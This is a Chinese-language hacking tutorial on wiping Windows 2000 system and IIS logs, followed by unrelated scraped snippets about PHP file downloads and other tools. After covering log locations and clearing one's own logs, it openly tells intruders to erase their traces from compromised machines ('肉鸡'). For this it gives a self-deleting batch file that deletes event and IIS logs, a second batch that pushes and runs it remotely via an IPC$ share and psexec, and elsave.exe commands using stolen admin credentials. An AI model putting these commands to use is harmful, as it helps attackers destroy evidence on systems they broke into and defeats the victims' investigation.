彻底清除本地和远程系统日志文件

  什么是日志文件?它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的,无论是网络管理员还是 黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防,日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除方法。

  一、日志文件的位置

  Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。

  安全日志文件:%systemroot%system32configSecEvent.EVT

  系统日志文件:%systemroot%system32configSysEvent.EVT

  应用程序日志文件:%systemroot%system32configAppEvent.EVT

  有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。

  二、清除自己电脑中的日志

  如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺寸时进行改写事件了,不会提示你清除日志。

  三、清除远程主机上的日志

  大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件:

  @del c:winntsystem32logfiles*.*

  @del c:winntsystem32config*.evt

  @del c:winntsystem32dtclog*.*

  @del c:winntsystem32*.log

  @del c:winntsystem32*.txt

  @del c:winnt*.txt

  @del c:winnt*.log

  @del c:del.bat

  把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。

  接下来再新建一个批处理文件,内容如下:

  @copy del.bat \%1c$

  @echo 向肉鸡复制本机的del.bat……OK

  @psexec \%1 c:del.bat

  @echo 在肉鸡上运行del.bat,清除日志文件……OK

  保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。

  清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use \ip pass /user: user,然后在命令行下执行如下命令:elsave -s \ip -l application -C,这样就删除了安全日志。

时间: 2024-08-22 14:46:45

彻底清除本地和远程系统日志文件的相关文章

PHP实现远程下载文件到本地

  经常写采集器发布接口需要使用到远程附件的功能,所以自己写了一个PHP远程下载文件到本地的函数,一般情况下已经够用了,如果服务器支持CURL函数,程序则会优先选择CURL,有需要的小伙伴可以参考下. 代码很简单就不多废话了,直接奉上: ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 <?php echo httpcopy("htt

PHP实例代码:实现远程下载文件到本地的函数

  经常写采集器发布接口需要使用到远程附件的功能,所以自己写了一个PHP远程下载文件到本地的函数,一般情况下已经够用了,如果服务器支持CURL函数,程序则会优先选择CURL,因为测试结果表明CURL的响应时间及资源占用率比file_get_contents小得多;如果大家有好的建议及改进方案,欢迎留言给我哦! 代码: echo httpcopy("http://www.baidu.com/img/baidu_sylogo1.gif"); function httpcopy($url,

iPad空间不足如何在百度云里面清除本地文件?

  第一种方式:取消本地离线可用的文件 有两个入口可以进行操作:第一在离线可用列表中可以对单个或者多个文件取消离线可用,第二在"更多"界面,选择"本地空间清理",点击"清除离线可用文件"按钮,可以取消所有离线的文件. 第二种方式:清除本地缓存文件 当您在线打开某个文件在线阅读,该文件就会被下载到本地,在"更多"界面,选择"本地空间清理",点击"清除缓存"按钮,可以清除所有在线打开过的文件

手机空间不足如何在百度云里面清除本地文件?

  第一种方式:清空本地离线可用的文件 有两个入口可以进行操作:第一在离线可用列表中可以对单个或者多个文件取消离线可用,第二在"更多"界面,选择"本地空间清理",点击"清空离线可用文件"按钮,可以取消所有离线可用的文件. 第二种方式:清除本地缓存文件 当您在线打开某个文件在线阅读,该文件就会被下载到本地,在"更多"界面,选择"本地空间清理",点击"清除缓存"按钮,可以清除所有在线打开过的

WinSCP保障本地和远程计算机间的文件复制操作的安全

WinSCP 是面向Windows的SFTP和FTP开源客户端.它可以保障本地和远程计算机间的文件复制操作的安全.Windows对FTP有内嵌的支持,它能通过命令提示符支持命令行的执行,且IE提供了基本的前端图形界面.这两种基于Windows的方式都缺乏安全性,因为通过FTP文件传输的鉴定及过程都是透明的.WinSCP的使用简便,提供了两种选择接口:第一种和旧版诺顿命令文件管理器(Norton Commander file manager)类似,另一种类似Windows Explorer.它保障

PHP实现远程下载文件到本地_php实例

代码很简单就不多废话了,直接奉上: <?php echo httpcopy("http://www.baidu.com/img/baidu_sylogo1.gif"); function httpcopy($url, $file="", $timeout=60) { $file = empty($file) ? pathinfo($url,PATHINFO_BASENAME) : $file; $dir = pathinfo($file,PATHINFO_DI

SaveRemoteFile函数之asp实现保存远程的文件到本地的代码_应用技巧

'================================================== '过程名:SaveRemoteFile '作  用:保存远程的文件到本地 '参  数:LocalFileName ------ 本地文件名 '参  数:RemoteFileUrl ------ 远程文件URL '================================================== Function SaveRemoteFile(LocalFileName,Rem

SaveRemoteFile函数之asp实现保存远程的文件到本地的代码

'================================================== '过程名:SaveRemoteFile '作  用:保存远程的文件到本地 '参  数:LocalFileName ------ 本地文件名 '参  数:RemoteFileUrl ------ 远程文件URL '================================================== Function SaveRemoteFile(LocalFileName,Rem

CssGaga教程:生成DataURI,抽取图片,下载远程css文件,图片无损压缩

文章简介:CssGaga教程:生成DataURI,抽取图片,下载远程css文件,图片无损压缩. CssGaga – 生成dataURI和MHTML Before: .base64{background-image:url('base64/logo.png');} .base64{border-image:url('base64/logo.png');} 注:要转换的图片文件所在base64文件夹与css同级且引用时为相对路径 After: .base64{background-image:url